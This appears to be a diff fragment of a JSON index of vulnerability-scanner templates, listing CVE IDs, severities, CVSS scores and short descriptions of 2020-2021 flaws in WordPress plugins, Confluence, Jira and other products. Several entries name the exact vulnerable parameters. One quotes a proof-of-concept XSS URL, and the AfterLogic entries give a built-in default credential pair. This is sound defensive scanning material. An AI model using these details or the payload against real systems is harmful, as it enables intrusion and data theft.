{"ID":"CVE-2020-7136","Info":{"Name":"HPE Smart Update Manager \u003c 8.5.6 - Remote Unauthorized Access","Severity":"critical","Description":"HPE Smart Update Manager (SUM) prior to version 8.5.6 could allow remote unauthorized access.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-7136.yaml"}
{"ID":"CVE-2020-7209","Info":{"Name":"LinuxKI Toolset \u003c= 6.01 - Remote Command Execution","Severity":"critical","Description":"LinuxKI v6.0-1 and earlier are vulnerable to remote code execution.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-7209.yaml"}
@ -981,6 +1022,7 @@
{"ID":"CVE-2020-8497","Info":{"Name":"Artica Pandora FMS \u003c=7.42 - Arbitrary File Read","Severity":"medium","Description":"Artica Pandora FMS through 7.42 is susceptible to arbitrary file read. An attacker can read the chat history, which is in JSON format and contains user names, user IDs, private messages, and timestamps. This can potentially lead to unauthorized data modification and other operations.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2020/CVE-2020-8497.yaml"}
{"ID":"CVE-2020-8512","Info":{"Name":"IceWarp WebMail Server \u003c=11.4.4.1 - Cross-Site Scripting","Severity":"medium","Description":"IceWarp Webmail Server through 11.4.4.1 contains a cross-site scripting vulnerability in the /webmail/ color parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2020/CVE-2020-8512.yaml"}
{"ID":"CVE-2020-8515","Info":{"Name":"DrayTek - Remote Code Execution","Severity":"critical","Description":"DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices allow remote code execution as root (without authentication) via shell metacharacters to the cgi-bin/mainfunction.cgi URI.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-8515.yaml"}
{"ID":"CVE-2020-8615","Info":{"Name":"Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery","Severity":"medium","Description":"A CSRF vulnerability in the Tutor LMS plugin before 1.5.3 for WordPress can result in an attacker approving themselves as an instructor and performing other malicious actions (such as blocking legitimate instructors).\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2020/CVE-2020-8615.yaml"}
{"ID":"CVE-2020-8641","Info":{"Name":"Lotus Core CMS 1.0.1 - Local File Inclusion","Severity":"high","Description":"Lotus Core CMS 1.0.1 allows authenticated local file inclusion of .php files via directory traversal in the index.php page_slug parameter.","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2020/CVE-2020-8641.yaml"}
{"ID":"CVE-2020-8644","Info":{"Name":"playSMS \u003c1.4.3 - Remote Code Execution","Severity":"critical","Description":"PlaySMS before version 1.4.3 is susceptible to remote code execution because it double processes a server-side template.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-8644.yaml"}
{"ID":"CVE-2020-8654","Info":{"Name":"EyesOfNetwork 5.1-5.3 - SQL Injection/Remote Code Execution","Severity":"high","Description":"EyesOfNetwork 5.1 to 5.3 contains SQL injection and remote code execution vulnerabilities. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. See also CVE-2020-8655, CVE-2020-8656, CVE-2020-8657, and CVE-2020-9465.","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2020/CVE-2020-8654.yaml"}
@ -1067,6 +1109,7 @@
{"ID":"CVE-2021-24176","Info":{"Name":"WordPress JH 404 Logger \u003c=1.1 - Cross-Site Scripting","Severity":"medium","Description":"WordPress JH 404 Logger plugin through 1.1 contains a cross-site scripting vulnerability. Referer and path of 404 pages are not properly sanitized when they are output in the WordPress dashboard, which can lead to executing arbitrary JavaScript code.","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2021/CVE-2021-24176.yaml"}
{"ID":"CVE-2021-24210","Info":{"Name":"WordPress PhastPress \u003c1.111 - Open Redirect","Severity":"medium","Description":"WordPress PhastPress plugin before 1.111 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24210.yaml"}
{"ID":"CVE-2021-24214","Info":{"Name":"WordPress OpenID Connect Generic Client 3.8.0-3.8.1 - Cross-Site Scripting","Severity":"medium","Description":"WordPress OpenID Connect Generic Client plugin 3.8.0 and 3.8.1 contains a cross-site scripting vulnerability. It does not sanitize the login error when output back in the login form, thereby not requiring authentication, which can be exploited with the default configuration.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24214.yaml"}
{"ID":"CVE-2021-24215","Info":{"Name":"Controlled Admin Access WordPress Plugin \u003c= 1.4.0 - Improper Access Control \u0026 Privilege Escalation","Severity":"critical","Description":"An Improper Access Control vulnerability was discovered in the plugin. Uncontrolled access to the website customization functionality and global CMS settings, like /wp-admin/customization.php and /wp-admin/options.php, can lead to a complete compromise of the target resource.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24215.yaml"}
{"ID":"CVE-2021-24226","Info":{"Name":"AccessAlly \u003c3.5.7 - Sensitive Information Leakage","Severity":"high","Description":"WordPress AccessAlly plugin before 3.5.7 allows sensitive information leakage because the file \\\"resource/frontend/product/product-shortcode.php\\\" (which is responsible for the [accessally_order_form] shortcode) dumps serialize($_SERVER), which contains all environment variables. The leakage occurs on all public facing pages containing the [accessally_order_form] shortcode, and no login or administrator role is required.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-24226.yaml"}
{"ID":"CVE-2021-24227","Info":{"Name":"Patreon WordPress \u003c1.7.0 - Unauthenticated Local File Inclusion","Severity":"high","Description":"Patreon WordPress before version 1.7.0 is vulnerable to unauthenticated local file inclusion that could be abused by anyone visiting the site. Exploitation by an attacker could leak important internal files like wp-config.php, which contains database credentials and cryptographic keys used in the generation of nonces and cookies.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-24227.yaml"}
{"ID":"CVE-2021-24235","Info":{"Name":"WordPress Goto Tour \u0026 Travel Theme \u003c2.0 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Goto Tour \u0026 Travel theme before 2.0 contains an unauthenticated reflected cross-site scripting vulnerability. It does not sanitize the keywords and start_date GET parameters on its Tour List page.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24235.yaml"}
@ -1080,6 +1123,7 @@
{"ID":"CVE-2021-24278","Info":{"Name":"WordPress Contact Form 7 \u003c2.3.4 - Arbitrary Nonce Generation","Severity":"high","Description":"WordPress Contact Form 7 before version 2.3.4 allows unauthenticated users to use the wpcf7r_get_nonce AJAX action to retrieve a valid nonce for any WordPress action/function.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-24278.yaml"}
{"ID":"CVE-2021-24284","Info":{"Name":"WordPress Kaswara Modern VC Addons \u003c=3.0.1 - Arbitrary File Upload","Severity":"critical","Description":"WordPress Kaswara Modern VC Addons plugin through 3.0.1 is susceptible to an arbitrary file upload. The plugin allows unauthenticated arbitrary file upload via the uploadFontIcon AJAX action, which can be used to obtain code execution. The supplied zipfile is unzipped in the wp-content/uploads/kaswara/fonts_icon directory with no checks for malicious files such as PHP.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24284.yaml"}
{"ID":"CVE-2021-24285","Info":{"Name":"WordPress Car Seller - Auto Classifieds Script - SQL Injection","Severity":"critical","Description":"The request_list_request AJAX call of the Car Seller - Auto Classifieds Script WordPress plugin through 2.1.0, available to both authenticated and unauthenticated users, does not sanitize, validate or escape the order_id POST parameter before using it in a SQL statement, leading to a SQL injection issue.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24285.yaml"}
{"ID":"CVE-2021-24286","Info":{"Name":"WordPress Plugin Redirect 404 to Parent 1.3.0 - Cross-Site Scripting","Severity":"medium","Description":"The settings page of the plugin did not properly sanitise the tab parameter before outputting it back, leading to a reflected Cross-Site Scripting issue.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24286.yaml"}
{"ID":"CVE-2021-24287","Info":{"Name":"WordPress Select All Categories and Taxonomies \u003c1.3.2 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Select All Categories and Taxonomies plugin before 1.3.2 contains a cross-site scripting vulnerability. The settings page of the plugin does not properly sanitize the tab parameter before outputting it back. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24287.yaml"}
{"ID":"CVE-2021-24288","Info":{"Name":"WordPress AcyMailing \u003c7.5.0 - Open Redirect","Severity":"medium","Description":"WordPress AcyMailing plugin before 7.5.0 contains an open redirect vulnerability due to improper sanitization of the redirect parameter. An attacker turning the request from POST to GET can craft a link containing a potentially malicious landing page and send it to the user.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24288.yaml"}
{"ID":"CVE-2021-24291","Info":{"Name":"WordPress Photo Gallery by 10Web \u003c1.5.69 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Photo Gallery by 10Web plugin before 1.5.69 contains multiple reflected cross-site scripting vulnerabilities via the gallery_id, tag, album_id and theme_id GET parameters passed to the bwg_frontend_data AJAX action, available to both unauthenticated and authenticated users.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24291.yaml"}
@ -1110,18 +1154,21 @@
{"ID":"CVE-2021-24499","Info":{"Name":"WordPress Workreap - Remote Code Execution","Severity":"critical","Description":"WordPress Workreap theme is susceptible to remote code execution. The AJAX actions workreap_award_temp_file_uploader and workreap_temp_file_uploader did not perform nonce checks, or validate that the request is from a valid user in any other way. The endpoints allowed for uploading arbitrary files to the uploads/workreap-temp directory. Uploaded files were neither sanitized nor validated, allowing an unauthenticated visitor to upload executable code such as php scripts.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24499.yaml"}
{"ID":"CVE-2021-24510","Info":{"Name":"WordPress MF Gig Calendar \u003c=1.1 - Cross-Site Scripting","Severity":"medium","Description":"WordPress MF Gig Calendar plugin 1.1 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize or escape the id GET parameter before outputting back in the admin dashboard when editing an event.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24510.yaml"}
{"ID":"CVE-2021-24554","Info":{"Name":"WordPress Paytm Donation \u003c=1.3.2 - Authenticated SQL Injection","Severity":"high","Description":"WordPress Paytm Donation plugin through 1.3.2 is susceptible to authenticated SQL injection. The plugin does not sanitize, validate, or escape the id GET parameter before using it in a SQL statement when deleting donations. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2021/CVE-2021-24554.yaml"}
{"ID":"CVE-2021-24627","Info":{"Name":"G Auto-Hyperlink \u003c= 1.0.1 - SQL Injection","Severity":"high","Description":"The G Auto-Hyperlink WordPress plugin through 1.0.1 does not sanitise or escape an 'id' GET parameter before using it in a SQL statement, to select data to be displayed in the admin dashboard, leading to an authenticated SQL injection\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2021/CVE-2021-24627.yaml"}
{"ID":"CVE-2021-24647","Info":{"Name":"Pie Register \u003c 3.7.1.6 - Unauthenticated Arbitrary Login","Severity":"high","Description":"The Registration Forms User profile, Content Restriction, Spam Protection, Payment Gateways, Invitation Codes WordPress plugin before 3.1.7.6 has a flaw in the social login implementation, allowing unauthenticated attacker to login as any user on the site by only knowing their user ID or username\n","Classification":{"CVSSScore":"8.1"}},"file_path":"http/cves/2021/CVE-2021-24647.yaml"}
{"ID":"CVE-2021-24666","Info":{"Name":"WordPress Podlove Podcast Publisher \u003c3.5.6 - SQL Injection","Severity":"critical","Description":"WordPress Podlove Podcast Publisher plugin before 3.5.6 is susceptible to SQL injection. The Social \u0026 Donations module, not activated by default, adds the REST route /services/contributor/(?P\u003cid\u003e[\\d]+) and takes id and category parameters as arguments. Both parameters can be exploited, thereby potentially enabling an attacker to obtain sensitive information, modify data, and/or execute unauthorized administrative operations.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24666.yaml"}
{"ID":"CVE-2021-24731","Info":{"Name":"Pie Register \u003c 3.7.1.6 - SQL Injection","Severity":"critical","Description":"The Registration Forms User profile, Content Restriction, Spam Protection, Payment Gateways, Invitation Codes WordPress plugin before 3.7.1.6 does not properly escape user data before using it in a SQL statement in the wp-json/pie/v1/login REST API endpoint, leading to an SQL injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24731.yaml"}
{"ID":"CVE-2021-24746","Info":{"Name":"WordPress Sassy Social Share Plugin \u003c3.3.40 - Cross-Site Scripting","Severity":"medium","Description":"WordPress plugin Sassy Social Share \u003c 3.3.40 contains a reflected cross-site scripting vulnerability.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24746.yaml"}
{"ID":"CVE-2021-24750","Info":{"Name":"WordPress Visitor Statistics (Real Time Traffic) \u003c4.8 -SQL Injection","Severity":"high","Description":"WordPress Visitor Statistics (Real Time Traffic) plugin before 4.8 does not properly sanitize and escape the refUrl in the refDetails AJAX action, which is available to any authenticated user. This could allow users with a role as low as subscriber to perform SQL injection attacks.","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2021/CVE-2021-24750.yaml"}
{"ID":"CVE-2021-24762","Info":{"Name":"WordPress Perfect Survey\u003c1.5.2 - SQL Injection","Severity":"critical","Description":"Perfect Survey WordPress plugin before 1.5.2 does not validate and escape the question_id GET parameter before using it in a SQL statement in the get_question AJAX action, allowing unauthenticated users to perform SQL injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24762.yaml"}
{"ID":"CVE-2021-24791","Info":{"Name":"Header Footer Code Manager \u003c 1.1.14 - Admin+ SQL Injection","Severity":"high","Description":"The Header Footer Code Manager WordPress plugin before 1.1.14 does not validate and escape the \"orderby\" and \"order\" request parameters before using them in a SQL statement when viewing the Snippets admin dashboard, leading to SQL injections\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2021/CVE-2021-24791.yaml"}
{"ID":"CVE-2021-24827","Info":{"Name":"WordPress Asgaros Forum \u003c1.15.13 - SQL Injection","Severity":"critical","Description":"WordPress Asgaros Forum plugin before 1.15.13 is susceptible to SQL injection. The plugin does not validate and escape user input when subscribing to a topic before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24827.yaml"}
{"ID":"CVE-2021-24838","Info":{"Name":"WordPress AnyComment \u003c0.3.5 - Open Redirect","Severity":"medium","Description":"WordPress AnyComment plugin before 0.3.5 contains an open redirect vulnerability via an API endpoint which passes user input via the redirect parameter to the wp_redirect() function without being validated. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24838.yaml"}
{"ID":"CVE-2021-24862","Info":{"Name":"WordPress RegistrationMagic \u003c5.0.1.6 - Authenticated SQL Injection","Severity":"high","Description":"WordPress RegistrationMagic plugin before 5.0.1.6 contains an authenticated SQL injection vulnerability. The plugin does not escape user input in its rm_chronos_ajax AJAX action before using it in a SQL statement when duplicating tasks in batches. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. This is a potential issue in both WordPress and WordPress Administrator.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2021/CVE-2021-24862.yaml"}
{"ID":"CVE-2021-24875","Info":{"Name":"WordPress eCommerce Product Catalog \u003c3.0.39 - Cross-Site Scripting","Severity":"medium","Description":"WordPress eCommerce Product Catalog plugin before 3.0.39 contains a cross-site scripting vulnerability. The plugin does not escape the ic-settings-search parameter before outputting it back in the page in an attribute. This can allow an attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24875.yaml"}
{"ID":"CVE-2021-24891","Info":{"Name":"WordPress Elementor Website Builder \u003c3.1.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Elementor Website Builder plugin before 3.1.4 contains a DOM cross-site scripting vulnerability. It does not sanitize or escape user input appended to the DOM via a malicious hash.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24891.yaml"}
{"ID":"CVE-2021-24910","Info":{"Name":"WordPress Transposh Translation \u003c1.0.8 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Transposh Translation plugin before 1.0.8 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the a parameter via an AJAX action (available to both unauthenticated and authenticated users when the curl library is installed) before outputting it back in the response.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24910.yaml"}
{"ID":"CVE-2021-24915","Info":{"Name":"Contest Gallery \u003c 13.1.0.6 - SQL injection","Severity":"critical","Description":"The plugin does not have capability checks and does not sanitise or escape the cg-search-user-name-original parameter before using it in a SQL statement when exporting users from a gallery, which could allow unauthenticated to perform SQL injections attacks, as well as get the list of all users registered on the blog, including their username and email address.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24915.yaml"}
{"ID":"CVE-2021-24917","Info":{"Name":"WordPress WPS Hide Login \u003c1.9.1 - Information Disclosure","Severity":"high","Description":"WordPress WPS Hide Login plugin before 1.9.1 is susceptible to incorrect authorization. An attacker can obtain the secret login page by setting a random referer string and making a request to /wp-admin/options.php as an unauthenticated user. This reveals the secret login location.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-24917.yaml"}
{"ID":"CVE-2021-24926","Info":{"Name":"WordPress Domain Check \u003c1.0.17 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Domain Check plugin before 1.0.17 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the domain parameter before outputting it back in the page.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24926.yaml"}
{"ID":"CVE-2021-24931","Info":{"Name":"WordPress Secure Copy Content Protection and Content Locking \u003c2.8.2 - SQL Injection","Severity":"critical","Description":"WordPress Secure Copy Content Protection and Content Locking plugin before 2.8.2 contains a SQL injection vulnerability. The plugin does not escape the sccp_id parameter of the ays_sccp_results_export_file AJAX action, available to both unauthenticated and authenticated users, before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24931.yaml"}
@ -1130,11 +1177,13 @@
{"ID":"CVE-2021-24947","Info":{"Name":"WordPress Responsive Vector Maps \u003c 6.4.2 - Arbitrary File Read","Severity":"medium","Description":"WordPress Responsive Vector Maps \u003c 6.4.2 contains an arbitrary file read vulnerability because the plugin does not have proper authorization and validation of the rvm_upload_regions_file_path parameter in the rvm_import_regions AJAX action, allowing any authenticated user to read arbitrary files on the web server.","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2021/CVE-2021-24947.yaml"}
{"ID":"CVE-2021-24956","Info":{"Name":"Blog2Social \u003c 6.8.7 - Cross-Site Scripting","Severity":"medium","Description":"The Blog2Social: Social Media Auto Post \u0026 Scheduler WordPress plugin before 6.8.7 does not sanitise and escape the b2sShowByDate parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting issue.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24956.yaml"}
{"ID":"CVE-2021-24970","Info":{"Name":"WordPress All-In-One Video Gallery \u003c2.5.0 - Local File Inclusion","Severity":"high","Description":"WordPress All-in-One Video Gallery plugin before 2.5.0 is susceptible to local file inclusion. The plugin does not sanitize and validate the tab parameter before using it in a require statement in the admin dashboard. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2021/CVE-2021-24970.yaml"}
{"ID":"CVE-2021-24979","Info":{"Name":"Paid Memberships Pro \u003c 2.6.6 - Cross-Site Scripting","Severity":"medium","Description":"The Paid Memberships Pro WordPress plugin before 2.6.6 does not escape the s parameter before outputting it back in an attribute in an admin page, leading to a Reflected Cross-Site Scripting\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24979.yaml"}
{"ID":"CVE-2021-24987","Info":{"Name":"WordPress Super Socializer \u003c7.13.30 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Super Socializer plugin before 7.13.30 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the urls parameter in its the_champ_sharing_count AJAX action (available to both unauthenticated and authenticated users) before outputting it back in the response.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24987.yaml"}
{"ID":"CVE-2021-24991","Info":{"Name":"WooCommerce PDF Invoices \u0026 Packing Slips WordPress Plugin \u003c 2.10.5 - Cross-Site Scripting","Severity":"medium","Description":"The Wordpress plugin WooCommerce PDF Invoices \u0026 Packing Slips before 2.10.5 does not escape the tab and section parameters before reflecting it an attribute, leading to a reflected cross-site scripting in the admin dashboard.","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2021/CVE-2021-24991.yaml"}
{"ID":"CVE-2021-24997","Info":{"Name":"WordPress Guppy \u003c=1.1 - Information Disclosure","Severity":"medium","Description":"WordPress Guppy plugin through 1.1 is susceptible to an API disclosure vulnerability. This can allow an attacker to obtain all user IDs and then use them to make API requests to get messages sent between users and/or send messages posing as one user to another.","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2021/CVE-2021-24997.yaml"}
{"ID":"CVE-2021-25003","Info":{"Name":"WordPress WPCargo Track \u0026 Trace \u003c6.9.0 - Remote Code Execution","Severity":"critical","Description":"WordPress WPCargo Track \u0026 Trace plugin before 6.9.0 is susceptible to remote code execution, The plugin contains a file which can allow an attacker to write a PHP file anywhere on the web server, leading to possible remote code execution. This can allow an attacker to execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-25003.yaml"}
{"ID":"CVE-2021-25008","Info":{"Name":"The Code Snippets WordPress Plugin \u003c 2.14.3 - Cross-Site Scripting","Severity":"medium","Description":"The Wordpress plugin Code Snippets before 2.14.3 does not escape the snippets-safe-mode parameter before reflecting it in attributes, leading to a reflected cross-site scripting issue.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-25008.yaml"}
{"ID":"CVE-2021-25016","Info":{"Name":"Chaty \u003c 2.8.2 - Cross-Site Scripting","Severity":"medium","Description":"The Chaty WordPress plugin before 2.8.3 and Chaty Pro WordPress plugin before 2.8.2 do not sanitise and escape the search parameter before outputting it back in the admin dashboard, leading to a Reflected Cross-Site Scripting.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-25016.yaml"}
{"ID":"CVE-2021-25028","Info":{"Name":"WordPress Event Tickets \u003c 5.2.2 - Open Redirect","Severity":"medium","Description":"WordPress Event Tickets \u003c 5.2.2 is susceptible to an open redirect vulnerability. The plugin does not validate the tribe_tickets_redirect_to parameter before redirecting the user to the given value, leading to an arbitrary redirect issue.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-25028.yaml"}
{"ID":"CVE-2021-25033","Info":{"Name":"Noptin \u003c 1.6.5 - Open Redirect","Severity":"medium","Description":"Noptin \u003c 1.6.5 is susceptible to an open redirect vulnerability. The plugin does not validate the \"to\" parameter before redirecting the user to its given value, leading to an open redirect issue.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-25033.yaml"}
{"ID":"CVE-2021-25052","Info":{"Name":"WordPress Button Generator \u003c2.3.3 - Remote File Inclusion","Severity":"high","Description":"WordPress Button Generator before 2.3.3 within the wow-company admin menu page allows arbitrary file inclusion with PHP extensions (as well as with data:// or http:// protocols), thus leading to cross-site request forgery and remote code execution.","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2021/CVE-2021-25052.yaml"}
@ -1145,6 +1194,7 @@
{"ID":"CVE-2021-25074","Info":{"Name":"WordPress WebP Converter for Media \u003c 4.0.3 - Unauthenticated Open Redirect","Severity":"medium","Description":"WordPress WebP Converter for Media \u003c 4.0.3 contains a file (passthru.php) which does not validate the src parameter before redirecting the user to it, leading to an open redirect issue.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-25074.yaml"}
{"ID":"CVE-2021-25075","Info":{"Name":"WordPress Duplicate Page or Post \u003c1.5.1 - Cross-Site Scripting","Severity":"low","Description":"WordPress Duplicate Page or Post plugin before 1.5.1 contains a stored cross-site scripting vulnerability. The plugin does not have any authorization and has a flawed cross-site request forgery check in the wpdevart_duplicate_post_parametrs_save_in_db AJAX action, allowing unauthenticated users to call it and change the plugin's settings, or perform such attack via cross-site request forgery.\n","Classification":{"CVSSScore":"3.5"}},"file_path":"http/cves/2021/CVE-2021-25075.yaml"}
{"ID":"CVE-2021-25078","Info":{"Name":"Affiliates Manager \u003c 2.9.0 - Cross Site Scripting","Severity":"medium","Description":"The plugin does not validate, sanitise and escape the IP address of requests logged by the click tracking feature, allowing unauthenticated attackers to perform Cross-Site Scripting attacks against admin viewing the tracked requests.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-25078.yaml"}
{"ID":"CVE-2021-25079","Info":{"Name":"Contact Form Entries \u003c 1.2.4 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape various parameters, such as form_id, status, end_date, order, orderby and search before outputting them back in the admin page\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-25079.yaml"}
{"ID":"CVE-2021-25085","Info":{"Name":"WOOF WordPress plugin - Cross-Site Scripting","Severity":"medium","Description":"The WOOF WordPress plugin does not sanitize or escape the woof_redraw_elements parameter before reflecting it back in an admin page, leading to a reflected cross-site scripting.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-25085.yaml"}
{"ID":"CVE-2021-25099","Info":{"Name":"WordPress GiveWP \u003c2.17.3 - Cross-Site Scripting","Severity":"medium","Description":"WordPress GiveWP plugin before 2.17.3 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape the form_id parameter before returning it in the response of an unauthenticated request via the give_checkout_login AJAX action. An attacker can inject arbitrary script in the browser of a user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-25099.yaml"}
{"ID":"CVE-2021-25104","Info":{"Name":"WordPress Ocean Extra \u003c1.9.5 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Ocean Extra plugin before 1.9.5 contains a cross-site scripting vulnerability. The plugin does not escape generated links which are then used when the OceanWP theme is active.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-25104.yaml"}
@ -1165,6 +1215,8 @@
{"ID":"CVE-2021-26085","Info":{"Name":"Atlassian Confluence Server - Local File Inclusion","Severity":"medium","Description":"Atlassian Confluence Server allows remote attackers to view restricted resources via local file inclusion in the /s/ endpoint.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2021/CVE-2021-26085.yaml"}
{"ID":"CVE-2021-26086","Info":{"Name":"Atlassian Jira Limited - Local File Inclusion","Severity":"medium","Description":"Affected versions of Atlassian Jira Limited Server and Data Center are vulnerable to local file inclusion because they allow remote attackers to read particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2021/CVE-2021-26086.yaml"}
{"ID":"CVE-2021-26247","Info":{"Name":"Cacti - Cross-Site Scripting","Severity":"medium","Description":"Cacti contains a cross-site scripting vulnerability via \"http://\u003cCACTI_SERVER\u003e/auth_changepassword.php?ref=\u003cscript\u003ealert(1)\u003c/script\u003e\" which can successfully execute the JavaScript payload present in the \"ref\" URL parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-26247.yaml"}
{"ID":"CVE-2021-26292","Info":{"Name":"AfterLogic Aurora and WebMail Pro \u003c 7.7.9 - Full Path Disclosure","Severity":"low","Description":"AfterLogic Aurora and WebMail Pro products with 7.7.9 and all lower versions are affected by this vulnerability, simply sending an HTTP DELETE request to WebDAV EndPoint with built-in “caldav_public_user@localhost” and it’s the predefined password “caldav_public_user” allows the attacker to obtain web root path.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2021/CVE-2021-26292.yaml"}
{"ID":"CVE-2021-26294","Info":{"Name":"AfterLogic Aurora and WebMail Pro \u003c 7.7.9 - Information Disclosure","Severity":"high","Description":"AfterLogic Aurora and WebMail Pro products with 7.7.9 and all lower versions are affected by this vulnerability, simply sending an HTTP GET request to WebDAV EndPoint with built-in “caldav_public_user@localhost” and it’s the predefined password “caldav_public_user” allows the attacker to read all files under the web root.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-26294.yaml"}
